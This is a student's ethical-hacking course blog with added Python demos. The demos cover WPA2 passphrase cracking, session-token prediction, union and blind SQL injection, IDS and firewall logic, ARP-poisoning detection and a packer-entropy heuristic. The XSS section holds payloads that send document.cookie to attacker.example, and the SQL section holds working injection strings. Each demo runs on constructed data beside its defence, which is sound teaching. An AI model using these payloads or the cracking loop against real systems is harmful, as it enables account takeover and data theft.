Tuesday, April 28, 2020

Blog 13

This chapter was about Wi-Fi, Bluetooth, and Mobile Devices

Wi-Fi

  • Message integrity code (MIC): a keyed check value appended to each frame so the receiver can detect any change to the frame's contents. Without the key an attacker cannot forge a valid MIC, so tampered frames are discarded.
  • Wigle.net can be used to find out where hotspots are in a geographic area.
  • Aircrack-ng is a Linux tool suite for auditing Wi-Fi security. It recovers WEP keys from captured traffic and runs dictionary attacks on WPA/WPA2-PSK passphrases using a captured four-way handshake; a long random passphrase is out of reach of such an attack.
  • Use Wi-Fi predictive planning tools to decide where to place access points and cabling.
  • Use RF scanning, such as a wireless intrusion detection or prevention system (WIDS/WIPS), to spot rogue access points and attacks on the air.
  • DHCP snooping can be configured on switches so that DHCP server messages (offers and acknowledgements) are accepted only from trusted ports, which stops a rogue DHCP server on an untrusted port from handing clients a malicious gateway or DNS server.
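
The two Wi-Fi points above that are worth seeing in code, the MIC and the WPA2-PSK dictionary attack, fit in one example, because the attack is nothing more than recomputing the MIC of a captured handshake frame under each candidate passphrase. This is an added example, not code from the blog or from aircrack-ng. The SSID, MAC addresses, nonces and the EAPOL frame are constructed here (no real capture), and only WPA2 key descriptor version 2 (HMAC-SHA1 MIC) is handled; WPA1 uses HMAC-MD5 and WPA3's SAE is not vulnerable to this offline attack at all.

```python
import hashlib
import hmac

# Constructed handshake material for this example (not a real capture).
SSID = b"HomeNet"
AP_MAC = bytes.fromhex("001122334455")    # authenticator address (AA)
STA_MAC = bytes.fromhex("66778899aabb")   # supplicant address (SPA)
ANONCE = bytes(range(32))                 # nonce sent by the AP in EAPOL message 1
SNONCE = bytes(range(32, 64))             # nonce sent by the client in EAPOL message 2
MIC_OFFSET = 81                           # offset of the Key MIC field inside an EAPOL-Key frame


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This deliberately slow step is what limits the attacker to a dictionary."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11 PRF-384 over the PMK. Bytes 0-15 of the PTK are the KCK that keys the MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(3):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:48]


def kck_for(passphrase: str) -> bytes:
    pmk = pmk_from_passphrase(passphrase, SSID)
    return ptk_from_pmk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with the MIC field zeroed)[:16]."""
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def verify_mic(passphrase: str, eapol: bytes) -> bool:
    """Receiver-side integrity check: recompute the MIC and compare in constant time."""
    return hmac.compare_digest(eapol_mic(kck_for(passphrase), eapol), eapol[MIC_OFFSET:MIC_OFFSET + 16])


def build_capture(passphrase: str) -> bytes:
    """Play the client: build EAPOL-Key message 2 (empty key data) and sign it with the real KCK."""
    frame = bytearray(99)
    frame[0:4] = b"\x02\x03\x00\x5f"   # 802.1X v2, type EAPOL-Key, body length 95
    frame[4] = 0x02                     # RSN key descriptor
    frame[5:7] = b"\x01\x0a"            # key info: HMAC-SHA1 MIC, pairwise key, MIC present
    frame[17:49] = SNONCE
    frame[MIC_OFFSET:MIC_OFFSET + 16] = eapol_mic(kck_for(passphrase), bytes(frame))
    return bytes(frame)


def crack(wordlist, eapol: bytes):
    """What aircrack-ng does with a handshake: try each candidate until the MIC verifies."""
    for candidate in wordlist:
        if verify_mic(candidate, eapol):
            return candidate
    return None


WORDLIST = ["password", "letmein", "sunshine42", "dragon"]   # constructed tiny dictionary

if __name__ == "__main__":
    capture = build_capture("sunshine42")
    print("recovered passphrase:", crack(WORDLIST, capture))
```

Two things to take from it: the attacker never talks to the access point after capturing the handshake, which is why WIDS alerts on deauthentication floods (the usual way to force a fresh handshake) matter; and flipping a single bit anywhere in the frame makes `verify_mic` fail, which is the whole job of the message integrity code.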

Bluetooth

  • BlueSmacking is a Bluetooth denial-of-service attack that floods a device with oversized L2CAP echo (ping) requests.
  • Bluejacking is sending unsolicited messages or data to a Bluetooth device; it is a nuisance rather than a theft of data.
  • Bluesnarfing is gaining unauthorized access to data (contacts, calendar, files) on a Bluetooth device.
  • Bluebugging is an attack that takes control of a device, effectively installing a backdoor through which the attacker can issue commands.
  • BtleJuice is a framework for performing man-in-the-middle attacks against Bluetooth Low Energy devices.
  • Super Bluetooth Hack is an application that can be used to view files on another Bluetooth device. It is a Java ME (J2ME) application, so running it on Android requires a Java ME runtime such as JBED.

Mobile Devices

  • Rooting is bypassing the security controls on an Android device to obtain superuser (root) access: modify, remove, or replace applications, run apps with administrative privileges, change system settings, and gain low-level access to the device hardware.
  • Jailbreaking is essentially rooting, but on iOS devices.
  • Hackode: The Hacker's Toolbox is an Android application that bundles reconnaissance, scanning, and Google-dorking tools.

Article

The article I read was about a security breach at Nintendo that compromised 160,000 accounts. Attackers hacked a legacy login system. Personal information as well as credit card numbers were leaked. I chose this article because I had gotten an email saying my Nintendo account was accessed from a strange location and I had to go in and change my password.

 https://threatpost.com/nintendo-confirms-breach-of-160000-accounts/155110/

Friday, April 17, 2020

Blog 12

This chapter was about web servers, web applications and SQL injections.

Web Servers

  • A web server is a computer used to store and distribute web pages to clients.
  • Web servers expose many vulnerabilities: default configurations and accounts, unpatched software, verbose error messages, and unnecessary services.
  • There are different types of server attacks.
    • Website defacement: A website is vandalized or defaced. The hacker could also change the site's content.
    • Directory traversal: The hacker uses ../ sequences (or their URL-encoded forms) in a requested path to reach files and directories outside the web root that should be restricted.
    • Cross-site scripting (XSS): Takes advantage of a site's failure to sanitize input. The attacker injects script into a page that the server reflects or stores, and the victim's browser runs it with the site's privileges.
Web Applications
  • A web application is software that runs on top of a web server.
  • They process, store, and distribute information.
  • Upload bombing uploads a large number of (or very large) files to exhaust the server's disk space and crash it.
  • Poison null byte attack sends a %00 (NUL) character so that string handling in the underlying code truncates a filename or path, bypassing checks such as a required file extension.
  • Cookies are an attack surface as well: they can be stolen, replayed, or tampered with if they are not protected (Secure and HttpOnly flags, and a signed value or server-side session state).
  • Web application hacking methodology
    • Start with footprinting the web infrastructure. 
      • Whois lookup
      • DNS interrogation
      • Port Scanning
    • Next scan for vulnerabilities using a vulnerability scanner
    • Begin attacks to target those vulnerabilities, or even do a DOS or DDOS attack.
    • Analyze web applications
      • Identify entry point for user input.
      • Identify which applications are provided to the client.
    • Attack authentication mechanism by targeting implementation and errors in web applications.
    • Attack authorization scheme
      • Attackers modify the parameters that control access in the query string, POST body, HTTP headers, and cookies (for example changing an ID to another user's) to reach resources they should not.
    • Attack session management mechanisms
      • Session token prediction
      • Session Hijacking
      • Man-in-the-middle attacks 
    • Perform injection attacks
      • Malicious input is interpreted as part of a query or command rather than as data, letting the attacker modify a database or alter a website.
      • Code injection: the hacker's input is executed as code by the application's interpreter.
      • Command injection: the hacker's input is passed to the operating system shell, letting the attacker run system commands.
    • Attack flaws in application logic
    • Attack database connectivity
    • Attack the web client application
  • Penetration Testing Methodology
    • Information gathering about target system or network
      • Active and cached web pages
      • Error Messages
      • Entry points 
      • Web applications
    • Check configuration settings
    • Complete application configuration management 
      • Use CGI scanners
      • Review web server content, configuration files, and log files.
      • Test for hidden file extensions and check locations of old backup and configuration files.
      • Administrative Interfaces
      • Review HTML and source code. Watch for comments and coding tags.
    • Authentication Testing
      • Password reset
      • Session timeout
      • Browser cache
      • Password error or lockout feature
    • Session Management Testing
      • Cookies
      • Session fixations
      • Exposed session variables
      • Cross-site request forgery (CSRF)
    • Denial-of-service testing
      • Account lockouts
      • Buffer overflows
      • User object allocation
    • Data validation
      • Input vulnerabilities
      • Character type or count
    • Authorization testing
    • Document all findings during the test
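
Session token prediction appears twice above, under the hacking methodology and again under session management testing, so here is one added example that serves both. It is not code from the blog or from Burp Suite; the weak token scheme (a request counter and a Unix timestamp packed as hex) is a hypothetical one written for this example, and the per-position entropy estimate is a crude stand-in for what Burp Sequencer reports on a sample of tokens.

```python
import secrets
from math import log2

TOKEN_WIDTH = 16   # hex characters per token


def weak_token(counter: int, issued_at: int) -> str:
    """Hypothetical weak scheme: a request counter and a Unix timestamp packed as hex.
    It looks random to the eye but is fully determined by two guessable numbers."""
    return f"{counter:08x}{issued_at:08x}"


def strong_token() -> str:
    """What a session token should be: 64 bits straight from the OS CSPRNG."""
    return secrets.token_hex(TOKEN_WIDTH // 2)


def estimated_entropy_bits(tokens) -> float:
    """Sum, over each character position, of the Shannon entropy seen in the sample.
    Positions that never change contribute 0 bits, which is what gives the weak scheme away."""
    n = len(tokens)
    total = 0.0
    for pos in range(len(tokens[0])):
        counts = {}
        for t in tokens:
            counts[t[pos]] = counts.get(t[pos], 0) + 1
        total -= sum(c / n * log2(c / n) for c in counts.values())
    return total


def predict_next(tokens):
    """Session token prediction: if consecutive tokens differ by a constant, extrapolate
    the next one. Returns None when no such pattern exists."""
    values = [int(t, 16) for t in tokens]
    deltas = {b - a for a, b in zip(values, values[1:])}
    if len(deltas) != 1:
        return None
    return f"{values[-1] + deltas.pop():0{len(tokens[0])}x}"


def collect_weak(n: int, start: int = 1000, issued_at: int = 1_700_000_000):
    """Constructed sample: n tokens handed out by the weak scheme within the same second."""
    return [weak_token(start + i, issued_at) for i in range(n)]


def collect_strong(n: int):
    return [strong_token() for _ in range(n)]


if __name__ == "__main__":
    weak, strong = collect_weak(32), collect_strong(32)
    print(f"weak:   ~{estimated_entropy_bits(weak):.1f} bits, next = {predict_next(weak)}")
    print(f"strong: ~{estimated_entropy_bits(strong):.1f} bits, next = {predict_next(strong)}")
```

In a real test you would log in thirty or forty times, collect the tokens the application issues, and run exactly these two checks; a token that can be extrapolated from its predecessors is a finding on its own, before any hijacking is attempted.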
SQL Injections
  • SQL (Structured Query Language) is the language used to query and manipulate relational databases.
  • SQL injection attacks a web application by supplying input that changes the SQL statements the application builds from that input.
  • They target flaws in web applications: input that is concatenated into a query instead of being passed as a parameter.
  • They exploit those input vulnerabilities and run with the application's own database privileges, so no exploit code is needed beyond crafted input.
  • SQL Injection Methodology
    • Information Gathering
      • See if the web application is connected to a database server
      • Inject characters such as a single quote into fields to generate error messages
    • Test for SQL injection vulnerabilities.
    • Launch an SQL injection attack
      • In-band: Uses one communication channel both to attack and to gather results (error-based and union-based are the main forms).
      • Error-based: Depends on database error messages leaking back to the page.
      • Union-based: Uses the UNION operator to combine the results of an injected SELECT with the application's own query into one result set.
      • Blind SQL injection: The page returns no data or errors from the query; the attacker only learns a true or false answer and infers the data one character at a time.
      • Content-based blind SQL: Uses a condition that makes the HTTP response differ for a true or false answer.
      • Time-based blind SQL: Uses a condition that delays the HTTP response for a true (or false) answer.
      • Advanced SQL Injection: Database, table, and column enumeration; password grabbing.
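
An added example (not from the blog) that puts the vulnerable and the fixed query side by side and runs a union-based and a content-based blind attack against each. The database is a constructed in-memory SQLite one with made-up users and products; time-based blind injection is left out because SQLite has no sleep function.

```python
import sqlite3
import string


def make_db() -> sqlite3.Connection:
    """Constructed sample database for the example."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT, is_admin INTEGER);
        INSERT INTO users(username, pw_hash, is_admin) VALUES
            ('alice', 'pbkdf2$a1b2c3', 1),
            ('bob',   'pbkdf2$d4e5f6', 0);
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, price REAL);
        INSERT INTO products(name, price) VALUES ('widget', 9.99), ('gadget', 19.99);
    """)
    return db


def search_vulnerable(db, name: str):
    """Vulnerable: the user's input is concatenated into the statement text."""
    sql = f"SELECT name, price FROM products WHERE name = '{name}'"
    return db.execute(sql).fetchall()


def search_safe(db, name: str):
    """Fixed: a parameterized query. The value travels separately and is never parsed as SQL."""
    return db.execute("SELECT name, price FROM products WHERE name = ?", (name,)).fetchall()


# Union-based (in-band): the injected SELECT must return the same number of columns (two).
UNION_PAYLOAD = "x' UNION SELECT username, pw_hash FROM users --"


def blind_extract_admin(search):
    """Content-based blind injection: the page only reveals whether a product row came back,
    so ask one yes/no question per character of the admin's username."""
    charset = string.ascii_lowercase + string.digits + "_"
    found = ""
    while len(found) < 64:                       # safety cap
        for ch in charset:
            probe = (f"widget' AND (SELECT substr(username, {len(found) + 1}, 1) "
                     f"FROM users WHERE is_admin = 1) = '{ch}' --")
            if search(probe):                    # true branch: the widget row is returned
                found += ch
                break
        else:
            break                                # no character matched: end of string
    return found


if __name__ == "__main__":
    db = make_db()
    print("union, vulnerable:", search_vulnerable(db, UNION_PAYLOAD))
    print("union, safe:      ", search_safe(db, UNION_PAYLOAD))
    print("blind, vulnerable:", blind_extract_admin(lambda n: search_vulnerable(db, n)))
    print("blind, safe:      ", repr(blind_extract_admin(lambda n: search_safe(db, n))))
```

The blind loop is the part worth studying: it never sees a database error or a row from `users`, yet it recovers the admin's username in at most 37 requests per character. Against the parameterized version every probe is just a product name that does not exist, and the loop returns an empty string.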

Article

The article I read was about a security breach at Beaumont Health. 112,000 people's information was leaked nearly a year ago. Details leaked included names, dates of birth, social security numbers, medical conditions, bank account information, and drivers' licenses. It doesn't say whether they caught the hacker, but they have implemented better training and education for their employees.

 https://www.freep.com/story/news/health/2020/04/17/beaumont-health-security-breach-personal-information/5155716002/

Blog 11

This chapter was about IDS, firewalls, and honeypots

IDS

  • There are different types of intrusion detection systems.
    • Network intrusion detection (NIDS): a sensor watches the traffic on a network segment.
    • Host intrusion detection (HIDS): an agent on one host watches its logs, files, and processes.
    • Signature-based: compares network traffic against a database of known attack signatures; catches known attacks, misses new ones.
    • Anomaly-based: compares network and host behavior to baseline profiles and flags deviations; can catch new attacks but produces more false positives.
    • Protocol-based: inspects a specific protocol (HTTP, for example) for deviations from its expected behavior.
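
To make the signature-based versus anomaly-based distinction concrete, here is an added example (not from the blog or any IDS product) that runs both kinds of check over constructed connection records. The record format ("source destination port path") and the hosts are made up; the anomaly detector learns a per-host baseline of distinct destination ports from a quiet training log and flags hosts that later exceed it by three standard deviations, which is a crude port-scan detector.

```python
import re
import statistics
from collections import defaultdict
from urllib.parse import unquote

# Signature database: known attack patterns, matched against the decoded request.
SIGNATURES = {
    "sqli-union": re.compile(r"union\s+select", re.I),
    "path-traversal": re.compile(r"\.\./"),
    "etc-passwd": re.compile(r"/etc/passwd"),
}

# Constructed records: "src dst dport path" (path is "-" for non-HTTP connections).
BASELINE_LOG = """\
10.0.0.2 10.0.0.10 80 /index.html
10.0.0.2 10.0.0.10 443 /login
10.0.0.3 10.0.0.10 80 /index.html
10.0.0.4 10.0.0.10 80 /about
10.0.0.5 10.0.0.10 80 /products?name=widget
10.0.0.5 10.0.0.10 443 /cart
"""

LIVE_LOG = """\
10.0.0.5 10.0.0.10 80 /products?name=gadget
10.0.0.5 10.0.0.10 443 /cart
10.0.0.7 10.0.0.10 80 /products?name=x'%20UNION%20SELECT%20username,pw_hash%20FROM%20users--
10.0.0.8 10.0.0.10 80 /static/../../etc/passwd
10.0.0.9 10.0.0.10 21 -
10.0.0.9 10.0.0.10 22 -
10.0.0.9 10.0.0.10 23 -
10.0.0.9 10.0.0.10 25 -
10.0.0.9 10.0.0.10 80 /
10.0.0.9 10.0.0.10 443 -
"""


def parse(log: str):
    records = []
    for line in log.strip().splitlines():
        src, dst, dport, path = line.split(maxsplit=3)
        records.append({"src": src, "dst": dst, "dport": int(dport), "path": path})
    return records


def signature_alerts(records):
    """Signature-based: URL-decode the request (attackers encode to dodge naive
    matching) and look for each known pattern."""
    alerts = set()
    for r in records:
        text = unquote(r["path"])
        for name, pattern in SIGNATURES.items():
            if pattern.search(text):
                alerts.add((r["src"], name))
    return alerts


def port_profile(records):
    """Number of distinct destination ports each source host touched."""
    ports = defaultdict(set)
    for r in records:
        ports[r["src"]].add(r["dport"])
    return {src: len(p) for src, p in ports.items()}


def anomaly_alerts(baseline_records, live_records, k: float = 3.0):
    """Anomaly-based: learn 'ports per host' from the baseline, then flag any host in the
    live traffic more than k standard deviations above the baseline mean."""
    base = list(port_profile(baseline_records).values())
    threshold = statistics.mean(base) + k * statistics.pstdev(base)
    return sorted(src for src, n in port_profile(live_records).items() if n > threshold)


if __name__ == "__main__":
    base, live = parse(BASELINE_LOG), parse(LIVE_LOG)
    print("signature hits:", sorted(signature_alerts(live)))
    print("anomalous hosts:", anomaly_alerts(base, live))
```

Note that the port scanner (10.0.0.9) never trips a signature, and the injection attempts never look anomalous in volume; that is the argument for running both detection styles together.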

Firewalls

  • Packet-filtering firewalls distinguish between good and bad traffic by matching packet header fields (source and destination address, protocol, port) against a rule list.
  • A bastion host is a hardened host placed at the network boundary; it has a public and an internal interface and is built on the assumption that it will be attacked.
  • A screened subnet (DMZ) uses a firewall with multiple interfaces, or a pair of firewalls, to put public-facing servers on their own segment between the Internet and the internal network.
  • Firewalking sends TCP and UDP packets with carefully chosen TTL values through the firewall to determine which ports its ACLs allow.
  • There are many evasion techniques that can be used to avoid a firewall.
    • Spoofing is when the hacker changes the source address in the IP packet header to trick the firewall into thinking the packet is from a trusted host.
    • Source routing is when the packet itself carries the route it should take (the IP loose or strict source-route option), so the attacker can steer it around the path the firewall protects; this is why firewalls drop source-routed packets.
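
A first-match packet filter, as an added example that is not from the blog or any firewall product, showing why the two evasion techniques above are usually dead on arrival: an anti-spoofing rule rejects packets that claim an internal source address on the outside interface, and source-routed packets are dropped before the rule list is consulted. The addresses, interface names and rule set are constructed for the example.

```python
from dataclasses import dataclass
from ipaddress import IPv4Network, ip_address, ip_network
from typing import Optional

INTERNAL = ip_network("10.0.0.0/8")
ANY = ip_network("0.0.0.0/0")


@dataclass(frozen=True)
class Packet:
    iface: str                    # interface the packet arrived on: "outside" or "inside"
    src: str
    dst: str
    proto: str                    # "tcp", "udp" or "icmp"
    dport: Optional[int]
    source_routed: bool = False   # IP source-route option present


@dataclass(frozen=True)
class Rule:
    iface: str
    src: IPv4Network
    dst: IPv4Network
    proto: Optional[str]          # None matches any protocol
    dport: Optional[int]          # None matches any port
    action: str                   # "allow" or "deny"
    note: str = ""


# Constructed rule set. Order matters: the anti-spoofing rule sits above the allow rules.
RULES = [
    Rule("outside", INTERNAL, ANY, None, None, "deny", "anti-spoofing: internal source on outside interface"),
    Rule("outside", ANY, ip_network("10.0.0.10/32"), "tcp", 443, "allow", "public HTTPS server"),
    Rule("inside", INTERNAL, ANY, "tcp", 80, "allow", "outbound web"),
    Rule("inside", INTERNAL, ANY, "tcp", 443, "allow", "outbound web"),
]


def matches(rule: Rule, pkt: Packet) -> bool:
    return (rule.iface == pkt.iface
            and ip_address(pkt.src) in rule.src
            and ip_address(pkt.dst) in rule.dst
            and rule.proto in (None, pkt.proto)
            and rule.dport in (None, pkt.dport))


def filter_packet(rules, pkt: Packet):
    """First-match evaluation with an implicit deny at the end. Source-routed packets are
    dropped up front: the sender, not the network, chose the path, so nothing about the
    packet's arrival can be trusted."""
    if pkt.source_routed:
        return "deny", "source-routed packet"
    for rule in rules:
        if matches(rule, pkt):
            return rule.action, rule.note
    return "deny", "implicit deny"


if __name__ == "__main__":
    legit = Packet("outside", "203.0.113.7", "10.0.0.10", "tcp", 443)
    spoofed = Packet("outside", "10.0.0.5", "10.0.0.10", "tcp", 443)
    routed = Packet("outside", "203.0.113.7", "10.0.0.10", "tcp", 443, source_routed=True)
    for name, pkt in [("legit", legit), ("spoofed", spoofed), ("source-routed", routed)]:
        print(name, filter_packet(RULES, pkt))
    print("spoofed, without the anti-spoofing rule:", filter_packet(RULES[1:], spoofed))
```

The last line of the demo is the point: with the anti-spoofing rule removed, the spoofed packet is accepted by the HTTPS rule, which is exactly what the evasion technique counts on.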

Honeypots

  • A honeypot is a physical or virtual device designed to look like a legitimate network resource to draw in a hacker.
  • There are different levels of honeypots, based on how much interaction they allow.
    • Low-interaction: Emulates a small number of services and applications; cheap and safe, but easy to fingerprint.
    • Medium-interaction: Emulates services more completely so the attacker can go further, but still without a real operating system behind them.
    • High-interaction: Runs a real OS with real applications and services; captures the most about the attacker, but must be isolated so it cannot be used as a pivot.

Article

The article I read was about a company called Wappalyzer. They disclosed this security breach after the attacker started emailing users offers to sell the company's database. The attacker had accessed one of the databases that had a misconfiguration. The hacker was not caught.

 https://www.zdnet.com/article/wappalyzer-discloses-security-breach-after-hacker-starts-emailing-users/

Saturday, April 11, 2020

Blog 10

This chapter was about sniffers, session hijacking, and Denial of Service

Sniffing

  • Promiscuous mode tells the network interface to pass every frame it sees up to the operating system, not just the frames addressed to it.
  • Popular sniffing tools include Wireshark, tcpdump, Cain and Abel, etc.
  • Ettercap is an easy-to-use tool for ARP poisoning, which lets an attacker sit in the middle of traffic on a switched LAN (a man-in-the-middle attack).
  • DNS spoofing is an attacker answering DNS queries with forged responses, redirecting the target system to a site the attacker controls.
  • Invest in reliable security tools to protect against sniffing and attacks.
  • Use more secure protocols for Internet traffic (TLS, SSH) so that captured traffic is unreadable.
  • Use switched networks (with port security) to better isolate segments of the network and limit what a sniffer on one port can see.
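
ARP poisoning, the technique Ettercap automates, leaves a recognizable trace on the wire, so here is an added example (not from the blog, Ettercap or arpwatch) of the two checks a host-based ARP watcher runs over captured replies: an IP whose MAC changes mid-capture, and one MAC answering for several IPs, which is what an attacker impersonating both the gateway and a victim looks like. The tcpdump-style lines and the addresses are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed, abbreviated "tcpdump -n arp" style output. The last two lines are the attack:
# aa:bb:cc:dd:ee:ff (10.0.0.9) starts answering for the gateway and for 10.0.0.5.
ARP_LOG = """\
12:00:01.000001 ARP, Reply 10.0.0.1 is-at 00:11:22:33:44:01, length 28
12:00:02.000002 ARP, Reply 10.0.0.5 is-at 00:11:22:33:44:05, length 28
12:00:03.000003 ARP, Reply 10.0.0.9 is-at aa:bb:cc:dd:ee:ff, length 28
12:00:10.000004 ARP, Reply 10.0.0.1 is-at aa:bb:cc:dd:ee:ff, length 28
12:00:10.000005 ARP, Reply 10.0.0.5 is-at aa:bb:cc:dd:ee:ff, length 28
"""

REPLY = re.compile(r"^(?P<ts>\S+) ARP, Reply (?P<ip>\S+) is-at (?P<mac>[0-9a-f:]{17}),")


def detect_arp_poisoning(log: str):
    """Return the IP->MAC changes seen in the capture and any MAC that ends up claiming
    more than one IP address."""
    table = {}                       # ip -> MAC most recently advertised for it
    changes = []
    for line in log.strip().splitlines():
        m = REPLY.match(line)
        if not m:
            continue                 # requests and non-ARP lines are ignored
        ts, ip, mac = m.group("ts", "ip", "mac")
        if ip in table and table[ip] != mac:
            changes.append((ts, ip, table[ip], mac))
        table[ip] = mac
    claimed = defaultdict(set)
    for ip, mac in table.items():
        claimed[mac].add(ip)
    suspects = {mac: sorted(ips) for mac, ips in claimed.items() if len(ips) > 1}
    return {"changes": changes, "suspects": suspects}


if __name__ == "__main__":
    result = detect_arp_poisoning(ARP_LOG)
    for ts, ip, old, new in result["changes"]:
        print(f"{ts} {ip} moved from {old} to {new}")
    for mac, ips in result["suspects"].items():
        print(f"{mac} claims {', '.join(ips)}")
```

The first check only works if the watcher saw the legitimate mapping before the attack began, which is why such tools are usually seeded with a static list of gateway and server MACs; the second check does not depend on ordering at all.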

Session Hijacking

  • Taking over an established session between a client and a web server, usually by stealing or predicting the session token.
  • Five steps to hijacking a session.
    • Sniffing
    • Monitor traffic
    • Desynchronize the current session
    • Predict the session ID
    • Inject commands that target the server
  • Cross-site scripting is injecting malicious script into web applications. This is usually done through user-created content that the site did not sanitize. For example, a Craigslist post could carry hidden script that steals the cookies of anyone who views it.
  • Burp Suite is really useful and bundles many tools (proxy, repeater, intruder, sequencer). It is a Java application, so it runs on Linux, Windows, and macOS.
  • I've really gotten the hang of using session IDs in cookies to log in to a site. It's really easy.
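
Cross-site scripting comes up twice in these notes, under web servers in Blog 12 and as the cookie-stealing route into session hijacking here, so one added example covers both. It is not code from the blog; the two payloads and the comment template are constructed for the example. It shows the vulnerable rendering beside the escaped one, for both a text context and an attribute context, since the attribute case is the one that `html.escape` only handles with `quote=True`.

```python
import html

# Constructed payloads an attacker might submit as "user content".
COOKIE_STEALER = "<script>new Image().src='http://attacker.example/c?'+document.cookie</script>"
ATTR_BREAKOUT = '" onmouseover="fetch(\'http://attacker.example/c?\'+document.cookie)'


def render_unsafe(comment: str, author: str) -> str:
    """Vulnerable: user-controlled strings are pasted straight into the HTML."""
    return f'<div class="comment" data-author="{author}"><p>{comment}</p></div>'


def render_safe(comment: str, author: str) -> str:
    """Hardened: escape for the HTML context. quote=True also encodes " and ', which is
    what stops the author value from closing the attribute it sits in."""
    return (f'<div class="comment" data-author="{html.escape(author, quote=True)}">'
            f'<p>{html.escape(comment, quote=True)}</p></div>')


def executable_script_present(page: str) -> bool:
    """Rough check a tester might script against the rendered page: is there a live
    <script> tag, or an event-handler attribute that the template itself never emits?"""
    lowered = page.lower()
    return "<script" in lowered or ' onmouseover="' in lowered


if __name__ == "__main__":
    for label, renderer in (("unsafe", render_unsafe), ("safe", render_safe)):
        print(label, "text context:     ", executable_script_present(renderer(COOKIE_STEALER, "bob")))
        print(label, "attribute context:", executable_script_present(renderer("hi", ATTR_BREAKOUT)))
```

Escaping is context-specific: a value dropped into a JavaScript string or a URL needs a different encoding, and marking the session cookie HttpOnly keeps `document.cookie` out of the script's reach but does not stop it from issuing requests as the logged-in user.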

Denial Of Service

  • Denial of service is when a computer is used to flood a server with more packets or requests than it can handle, so legitimate users are turned away.
  • Distributed denial of service (DDoS) is when numerous computers (often a botnet) are used to overload target systems.
  • Limit the access points into the network.
  • Reduce unnecessary services.
  • Use anti-malware, threat prevention, and intrusion prevention.

Article

 The article I read was about a company called RigUp. The breach exposed more than 70,000 files. The files belong to US energy sector clients. If it had been exposed to malicious hackers or the general public, it would have been devastating. These files included human resources information, such as social security numbers, resumes, photos, paperwork, birth dates, insurance, etc. The company is going to do a root cause analysis to find out why the leak happened.

Saturday, April 4, 2020

Blog 9

This chapter was about malware.

  • A crypter is software that encrypts or obfuscates malware so the code cannot easily be analyzed or reverse-engineered and signature-based anti-virus does not recognize it. A small stub decrypts the payload in memory at run time.
  • Sheep dipping is analyzing incoming emails, files, and removable media for malware on an isolated system before they are allowed onto the network.
  • A terminate-and-stay-resident (TSR) virus sits in RAM and infects anything opened on the system until the computer is shut down or rebooted.
  • Learned about different kinds of viruses, back doors, worms, and malware.
  • I learned about malware analysis, including sheep dipping, static analysis, and dynamic analysis.
  • Heuristic algorithms give a good-enough answer in a short amount of time: they trade completeness and some accuracy for speed, so they can flag unknown malware but also produce false positives.
  • I learned the commands to use with netstat.
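
The crypter and heuristic points above meet in one classic static-analysis check, so here is an added example (not from the blog or any anti-virus engine): a byte-entropy heuristic. Encrypted or packed data is close to uniformly random, so a file whose blocks mostly score near 8 bits per byte is probably a crypter's output. The two samples are constructed; the "crypted" one is seeded pseudo-randomness standing in for an encrypted payload.

```python
import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant stream, up to 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def entropy_profile(data: bytes, block: int = 1024):
    """Entropy of each fixed-size block, so a small plaintext stub in front of an
    encrypted payload does not drag the whole-file figure down."""
    return [shannon_entropy(data[i:i + block]) for i in range(0, len(data), block)]


def looks_packed(data: bytes, threshold: float = 7.0, min_fraction: float = 0.5) -> bool:
    """Heuristic verdict: if at least min_fraction of the blocks exceed the threshold the
    file is probably compressed, packed or encrypted. Fast, and deliberately incomplete:
    a legitimate ZIP or JPEG trips it too, which is the false-positive cost of heuristics."""
    blocks = entropy_profile(data)
    return sum(e > threshold for e in blocks) / len(blocks) >= min_fraction


# Constructed samples.
PLAIN_SAMPLE = b"This program cannot be run in DOS mode.\r\n" * 60
_rng = random.Random(1337)                                       # seeded so the example is repeatable
CRYPTED_SAMPLE = bytes(_rng.getrandbits(8) for _ in range(4096))  # stands in for a crypter's payload


if __name__ == "__main__":
    for name, sample in (("plain", PLAIN_SAMPLE), ("crypted", CRYPTED_SAMPLE)):
        profile = ", ".join(f"{e:.2f}" for e in entropy_profile(sample))
        print(f"{name}: blocks [{profile}] -> packed? {looks_packed(sample)}")
```

Real engines combine this with other cheap signals (a tiny import table, writable and executable sections, a known packer stub) before unpacking the file in a sandbox, which is where dynamic analysis takes over.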

Article

The article I read about was a security breach at Marriott Hotels. Information exposed was emails, names, addresses, phone numbers, and birthdays. This was accessed using the login credentials of two employees at a franchise property. 5.2 million guests' information was compromised. It didn't say if they caught them.

https://www.cnet.com/how-to/marriott-data-breach-exposes-over-5-million-people-latest-major-security-hack/